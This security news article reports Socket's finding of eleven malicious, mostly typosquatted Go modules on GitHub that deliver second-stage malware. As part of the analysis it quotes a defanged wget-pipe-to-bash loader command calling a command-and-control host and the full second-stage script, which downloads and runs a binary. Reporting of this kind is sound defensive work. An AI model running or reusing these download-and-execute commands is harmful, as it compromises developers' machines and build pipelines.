The Malicious Go Modules: 11 Malicious Go Packages Found on GitHub Deploying Stealthy Malware

Socket’s Threat Research Team has uncovered an alarming wave of malicious Go packages—some still live on GitHub—designed to compromise developers and CI pipelines via stealthy, obfuscated loaders and live second-stage payloads.

In a campaign reminiscent of prior open-source supply chain attacks, Socket researchers have discovered eleven malicious Go modules, eight of which are typosquats, that stealthily deliver second-stage malware. The packages, available via public repositories like GitHub, contain obfuscated payload loaders designed to execute commands in-memory, bypassing disk-based detection.

“At runtime, the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command and control (C2) endpoints, and executes it in memory,” Socket reported.

This attack method is particularly dangerous due to its compatibility across platforms—affecting both Linux-based build systems and Windows workstations. Even more concerning, six out of the ten C2 URLs were still live at the time of disclosure.

The campaign leverages both typosquatting and namespace confusion to masquerade as legitimate packages. Malicious modules discovered include:

• github.com/stripedconsu/linker
• github.com/agitatedleopa/stm
• github.com/expertsandba/opt
• github.com/wetteepee/hcloud-ip-floater
• github.com/weightycine/replika
• github.com/ordinarymea/tnsr_ids
• github.com/ordinarymea/TNSR_IDS
• github.com/cavernouskina/mcp-go
• github.com/lastnymph/gouid
• github.com/sinfulsky/gouid
• github.com/briefinitia/gouid

Each package hides a dangerous command deep in its codebase, often buried after hundreds of lines. The payloads are constructed using an index-based array of string fragments that are concatenated at runtime into a shell command like:

/bin/sh -c wget -O - https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &

“The obfuscation works by establishing a string array, calling different indices of the array, and constructing a command from the indices,” the researchers explained.

Upon execution, the malware downloads a shell script which in turn pulls a malicious ELF or PE binary, depending on the operating system.

One such live script from https://monsoletter[.]icu/storage/de373d0df/f0eee999 checks for a Linux environment, sleeps for 3600 seconds (to evade sandboxes), downloads a binary, makes it executable, and runs it:

#!/bin/bash

cd ~
if [[ "$OSTYPE" == "linux-gnu"* ]]; then
	if ! [ -f ./f0eee999 ]; then
		sleep 3600
		wget https://monsoletter[.]icu/storage/de373d0df/f0eee999
		chmod +x ./f0eee999
		app_process_id=$(pidof f0eee999)
		if [[ -z $app_process_id ]]; then
			./f0eee999
		fi
	fi
fi

The downloaded binary (SHA256: 844013025bf7c5d01e6f48df0e990103…) reads browser data, collects system info, and communicates with external servers, establishing backdoor access to infected systems.

Other packages like replika, tnsr_ids, and gouid variants execute similar commands targeting Windows systems via certutil.exe, downloading and executing malicious EXEs in the background.

A recurring technique used by these attackers is typosquatting, where malicious packages use subtly altered names of legitimate modules.

Additionally, Go’s decentralized nature makes it difficult to distinguish legitimate packages from impostors. Developers often import modules directly from GitHub, creating ambiguous trust boundaries and increasing the risk of accidental installation.

While attribution remains tentative, Socket notes that seven of the ten malicious URLs share the same path structure (/storage/de373d0df/a31546bf), and multiple packages use the exact same C2 endpoints, strongly suggesting some common authorship.

“We have more confidence that certain ones are by the same threat actor due to C2 reuse and the format of the code.”

However, shared obfuscation alone is not conclusive—code reuse is common in the threat actor ecosystem.

Related Posts:

• SERPENTINE#CLOUD: Stealthy Malware Campaign Leverages Cloudflare Tunnels for In-Memory RAT Delivery
• Gold Melody’s Stealthy Campaign: Leaked ASP.NET Machine Keys Fuel In-Memory RCE & Privilege Escalation
• Malicious Go Packages Target Developers with Hidden Loader Malware on Linux and macOS
• Typosquatting & Backdoors: Lazarus’ Latest npm Campaign

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy